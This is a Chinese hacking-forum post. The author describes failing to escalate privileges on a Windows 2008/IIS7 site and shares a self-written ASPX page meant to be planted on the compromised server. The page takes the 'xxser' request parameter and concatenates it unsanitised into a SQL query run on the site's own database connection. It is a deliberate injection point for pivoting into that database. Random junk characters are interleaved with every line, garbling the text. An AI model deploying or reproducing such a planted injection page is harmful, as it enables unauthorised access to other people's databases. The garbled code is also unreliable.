昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。 D w3 j4 [% w6 R# T2 t
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。% S+ j* q8 w9 N; D7 X
代码量不多,自己写个拉倒了。烦死了。
. W/ W* U* x4 v. \7 g
5 x. d" ?+ b$ I& a+ d7 |
3 z/ e9 U3 v2 E) a5 ]( m<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
, T3 Q, [9 H' ]& j ^$ `; R7 ]<html xmlns="http://www.w3.org/1999/xhtml">
, n5 n a3 `6 [( L" B<head runat="server">0 t( L+ L& m" Y' Q4 }8 X t
<title>暗影aspx构造注射专用页面</title>+ h/ `% }8 k. g. ]- ^. i4 y$ N
</head>; r$ W2 b( \3 V* h ]6 e
<body>
0 r! e% k% }8 U4 l$ m3 {/ l6 { <form id="form1" runat="server">, o; l! [5 M0 G7 s
<div>0 s9 x- L( q' M( D! ~9 z
<script language="c#" runat="server">9 u. N+ t9 j+ x" X+ R
: v* f$ F1 R2 `# E% N% `" e
void page_init(object sender, EventArgs e)5 w/ N, c0 m5 X$ N; h
{7 j8 \( }: k( ]
9 n$ J' i! | F
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection(); H1 I1 K; B; t9 J" r) h9 m
: M, ~% y: t4 ^ B
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
8 D6 L; W- A- y$ ^! b conn.Open();
( L4 r$ t7 m1 A+ {
/ m& p2 f6 [8 d6 Y# W string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
& e. {" g9 R+ t" o ' R H# @) m- P
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);& M9 W+ k" e" W
int x = command.ExecuteNonQuery();3 X# T7 r* h0 A! x2 `
Response.Write(i+"\n");5 [* i/ d1 a' i( `, W/ V
Response.Write(x);
% p4 g( _/ H2 k S8 z7 }# ` conn.Close();
& E) }) R }8 Q }
$ ?: m" i6 h7 F8 |* p' Q( J+ h 3 e! p+ v9 ]2 O
</script>
0 S6 N) D1 {1 v/ C- A7 V </div>7 m0 a1 A7 b6 m3 ]
</form>; P5 U# f5 q% ?1 Y3 L4 y
</body># M3 j2 t! X7 d6 {5 |4 P( a
</html>0 Y; E& _; u: d, X' B F
|